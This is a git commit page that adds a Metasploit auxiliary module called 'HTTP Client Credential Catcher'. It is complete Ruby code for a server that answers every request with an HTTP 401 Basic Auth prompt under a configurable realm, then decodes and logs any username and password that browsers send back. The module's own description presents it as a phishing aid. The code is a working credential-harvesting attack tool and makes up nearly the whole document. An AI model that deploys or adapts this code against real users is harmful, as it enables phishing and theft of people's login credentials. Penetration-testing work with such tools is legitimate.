Merge branch 'master' of https://github.com/saintpatrick/metasploit-framework into saintpatrick-master

2012-08-20 15:31:38 -05:00 · 2012-08-20 15:31:38 -05:00 · 9a1c63d38a
parent 14e0dcc73b e6bda752ee
commit 9a1c63d38a
1 changed files with 88 additions and 0 deletions
--- a/modules/auxiliary/server/capture/http_basic.rb
+++ b/modules/auxiliary/server/capture/http_basic.rb
@ -0,0 +1,88 @@
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'        => 'HTTP Client Credential Catcher',
+			'Version'     => '$Revision:  $',
+			'Description'    => %q{
+				This module responds to all requests for resources with a HTTP 401.  This should
+				cause most browsers to prompt for credentials.  If the user enters Basic Auth creds
+				they are sent to the console.
+
+				This may be helpful in some phishing expeditions where it is possible to embed a
+				resource into a page.
+
+				This attack is discussed in Chapter 3 of The Tangled Web by Michal Zalewski.
+			},
+			'Author'      => ['saint patrick <saintpatrick@l1pht.com>'],
+			'License'     => MSF_LICENSE,
+			'Actions'     =>
+				[
+					[ 'Capture' ]
+				],
+			'PassiveActions' =>
+				[
+					'Capture'
+				],
+			'DefaultAction'  => 'Capture'
+		)
+
+		register_options(
+			[
+				OptPort.new('SRVPORT',    [ true, "The local port to listen on.", 80 ]),
+				OptString.new('REALM',    [ true, "The authentication realm you'd like to present.", "Secure Site" ]),
+			], self.class)
+	end
+
+	# Not compatible today
+	def support_ipv6?
+		false
+	end
+
+	def run
+		@myhost   = datastore['SRVHOST']
+		@myport   = datastore['SRVPORT']
+		@realm    = datastore['REALM']
+
+		print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
+		exploit()
+	end
+
+	def on_request_uri(cli, req)
+		phost = cli.peerhost
+		mysrc = Rex::Socket.source_address(cli.peerhost)
+
+
+		if(req['Authorization'] and req['Authorization'] =~ /basic/i)
+			basic,auth = req['Authorization'].split(/\s+/)
+			user,pass  = Rex::Text.decode_base64(auth).split(':', 2)
+
+			report_auth_info(
+				:host      => cli.peerhost,
+				:port => datastore['SRVPORT'],
+				:sname     => 'HTTP',
+				:user      => user,
+				:pass      => pass,
+				:source_type => "captured",
+				:active    => true
+			)
+
+			print_status("HTTP LOGIN #{cli.peerhost} > :#{@myport} #{user} / #{pass} => #{req.resource}")
+			send_not_found(cli)
+		else
+			response = create_response(401, "Unauthorized")
+			response.headers['WWW-Authenticate'] = "Basic realm=\"#{@realm}\""
+			cli.send_response(response)
+		end
+
+		return
+
+	end
+
+end